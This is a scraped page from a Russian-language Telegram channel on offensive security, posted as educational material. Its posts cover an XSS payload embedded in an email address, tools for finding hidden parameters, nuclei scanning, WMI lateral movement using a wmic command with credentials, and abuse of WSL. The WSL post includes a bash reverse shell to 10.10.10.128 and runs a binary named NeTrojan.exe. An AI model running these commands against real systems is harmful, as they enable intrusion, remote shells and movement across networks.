Похек
16.6K subscribers
2.1K photos
110 videos
243 files
3.07K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Атаки на 1с-битрикс | Часть 2 | Атака🤓

Атака на самописы
Когда вы обнаружили список самописных скриптов и определились какие query string параметры они принимают, можно протестировать на ряд уязвимостей в зависимости от функционала скрипта
К примеру, если это подписка на рассылку, значит он будет ожидать email адрес, оттуда и можно построить вектор атаки и потестировать к примеру на XSS таким пэйлоадом: mail(<script>alert(0)</script>)@gmail.com
Полный список трюков по email можно глянуть тут

🟢Атака Mass Assignment
Программные фреймворки или скрипты иногда позволяют разработчикам автоматически привязывать параметры HTTP-запроса к переменным кода программы или объектам, чтобы упростить использование этого фреймворка или скрипта. Иногда это может причинить вред
Мы можем использовать эту методологию для добавления новых параметров, которые разработчик не предполагал, что, в свою очередь, создает или перезаписывает объекты в программном коде
Это называется Mass Assignment

Таким образом мы можем поискать скрытые параметры и потестить их на любые уязвимости
Список утилит для поиска скрытых параметров:
➡️X8
➡️ParamSpider
➡️Arjun
➡️ParamMiner

ЧТНП | #web #исследования
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
nuclei & nuclei templates

Я думаю многие из нас знают такой великолепный инструмент, как nuclei. Для тех кто все еще не знаком, проведу краткий ликбез:
nuclei - opensource инструмент автоматизации пентеста. Который написан на go, что обеспечило ему неплохую производительность даже на крупном скоупе. Сканирование происходит по template'ам. Эти шаблоны может написать любой юзер. Синтаксис шаблонов достаточно прост для проверки и эксплуатации комплексных CVE.

Установка:
sudo apt install -y nuclei

go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

brew install nuclei

Использование:
nuclei -h

Вывести список всех загруженных шаблонов
nuclei -tl

Базовое использование
nuclei -t название_шаблона -l scope.txt
nuclei -t cves -u example.com

Классический список шаблонов выглядит следующим образом. Но ведь не обязательно использовать только эти популярный шаблоны) Поэтому я нашел для вас репозиторий, где собраны самые интересные репозитории с шаблонами для nuclei.

#tools
🔥7
Forwarded from Private Shizo
This media is not supported in your browser
VIEW IN TELEGRAM
💥CyberGhostVPN - the story of finding MITM, RCE, LPE in the Linux client
This article discloses the vulnerabilities that were present in the CyberGhostVPN Linux 1.3.5 client (and versions below). The latest version of the CyberGhostVPN Linux client is now free from these vulnerabilities.
Всем эффективного дня! Помню, что у меня на канале много интернов и джунов. Ребят, про вас никто не забыл)
Что вам интересно почитать из обучающего контента?

#пообсуждаем
cyber-security.pdf
235.9 KB
Cyber Security Expert

Step by step guide to becoming a Cyber Security Expert in 2023

#попросьбампросящих
6
🔥4🌚2
Просто интересные pdfэфочки
Повышение_привилегий_на_узлах_локальной_сети_в_ОС_Windows.pdf
7.5 MB
Лекция по повышению привилегий Windows и т.п. боль

#попросьбампросящих
🫡5👏1
Ещё материал про горизонтальное перемещение в Windows

#попросьбампросящих
Forwarded from CyberSecrets
Боковое перемещение: WMI

Windows Management Interface (WMI) одна из самых старых технологий управления Windows. Для взаимодействия использует RPC на 135 порту и требует привилегии локального администратора.

WMI позволяет запускать процессы на удаленном хосте. Можно воспользоваться утилитой wmic. И хотя Microsoft сообщало, что утилита будет удалена из операционной системы она еще встречается.

wmic /node:comp.domain.local /user:domain\user /password:Qwerty123 process call create "C:\Windows\System32\calc.exe"


Или использовать cmdlet Get-WmiObject

$process = Get-WmiObject -query "SELECT * FROM Meta_Class WHERE __Class = 'Win32_Process'" -namespace "root\cimv2" -computername comp1
$results = $process.Create( "calc.exe" )


Встроенные в Windows средства не позволяют получить интерактивную оболочку и удобнее использовать другие механизмы RDP и PSRemoting или воспользоваться сторонними утилитами, которые предоставляют интерактивный режим, например, wmiexec, invoke-wmiexec, wmishell и другие.

С моей точки зрения WMI не самый удобный механизм для бокового перемещения, но это отличный инструмент для сбора информации на удаленном хосте. Например, аналог команды netstat будет следующим:

Get-WmiObject -Namespace ROOT\StandardCIMV2 -Class MSFT_NetTCPConnection -ComputerName comp| Select-Object LocalAddress, RemoteAddress, RemotePort, State


#Внутрянка #RedTeam #PurpleTeam
🔥3
Forwarded from Monkey Hacker
Abuse WSL

#RU

Windows Subsystem for Linux (WSL) - по факту данная функция в Windows, дает доступ к компактной версии файловой системе Linux, т.е мы можем выполнять практически любые команды Linux в Windows.
И естественно благодаря данной функции мы можем выполнить различные хитрости, которые нам недоступны как обычному пользователю, но можем выполнить в пределах нашего шелла. Нужны самые стандартные права пользователя, но важно, чтобы мы смогли выполнить wsl --install для включения данного функционала.
Потом убеждаемся, что данный функционал действительно работает и смотрим, доступен ли нам какой-либо дистрибутив Linux (по стандарту там будет Ubuntu)

#EN

Windows Subsystem for Linux (WSL) - in fact this function in Windows, gives us access to a compact version of the Linux file system, i.e. we can execute almost any Linux command in Windows.
And of course with this feature we can do all sorts of tricks which we can't do as a normal user but we can do within our shell. We need the most standard user rights, but it is important that we can run wsl --install to enable this feature.
Then we make sure that this feature really works and check if any Linux distro is available for us (by default this would be Ubuntu)

wsl --list --running

#RU

Если все ок, то проверьте, что у вас есть еще доступ к bash оболочке (bash.exe). Обычно он имеет путь следующий:
C:\Windows\system32\bash.exe

#EN

If everything is ok, check that you have access to the bash shell (bash.exe). It usually has the path as follows:
C:\Windows\system32\bash.exe

Начинаем с базового | Starting with basic

wsl.exe "whoami"

OR

bash.exe -c "whoami"

Если ответ видим root, то можно попробовать rev-shell | If the answer is root, you can try rev-shell

bash.exe -c "bash -i >& /dev/tcp/10.10.10.128/5555 0>&1"

#RU

P.S если что то это не тот же самый root, который есть в виндовой тачке, однако мы можем выполнять теперь те действия, которые изначально нам не были доступны

#EN

P.S it is not the same as root, which is in the wind machine, but we can now do things that were not originally available to us

#RU

Мы можем выполнять/модифицировать различные бинари на основной машине

#EN

We can run/modify different binary on the main machine

wsl.exe -e /mnt/c/Windows/System32/NeTrojan.exe

Have fun 👀
Please open Telegram to view this post
VIEW IN TELEGRAM
День Винды получается )
🫡10🤝2